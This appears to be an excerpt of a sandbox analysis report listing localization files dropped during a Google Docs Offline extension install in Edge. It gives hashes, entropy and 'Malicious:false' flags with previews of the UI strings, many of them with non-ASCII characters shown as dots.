                                                                                                                                          SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1389
                                                                                                                                          Entropy (8bit):4.561317517930672
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                          MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                          SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                          SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                          SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1763
                                                                                                                                          Entropy (8bit):4.25392954144533
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                          MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                          SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                          SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                          SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):930
                                                                                                                                          Entropy (8bit):4.569672473374877
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                          MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                          SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                          SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                          SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):913
                                                                                                                                          Entropy (8bit):4.947221919047
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                          MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                          SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                          SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                          SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):806
                                                                                                                                          Entropy (8bit):4.815663786215102
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                          MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                          SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                          SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                          SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):883
                                                                                                                                          Entropy (8bit):4.5096240460083905
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                          MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                          SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                          SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                          SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1031
                                                                                                                                          Entropy (8bit):4.621865814402898
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                          MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                          SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                          SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                          SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1613
                                                                                                                                          Entropy (8bit):4.618182455684241
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                          MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                          SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                          SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                          SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):851
                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):851
                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):848
                                                                                                                                          Entropy (8bit):4.494568170878587
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                          MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                          SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                          SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                          SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1425
                                                                                                                                          Entropy (8bit):4.461560329690825
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                          MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                          SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                          SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                          SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):961
                                                                                                                                          Entropy (8bit):4.537633413451255
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                          MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                          SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                          SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                          SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):959
                                                                                                                                          Entropy (8bit):4.570019855018913
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                          MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                          SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                          SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                          SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):968
                                                                                                                                          Entropy (8bit):4.633956349931516
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                          MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                          SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                          SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                          SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):838
                                                                                                                                          Entropy (8bit):4.4975520913636595
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                          MD5:29A1DA4ACB4C9D04F080BB101E204E93
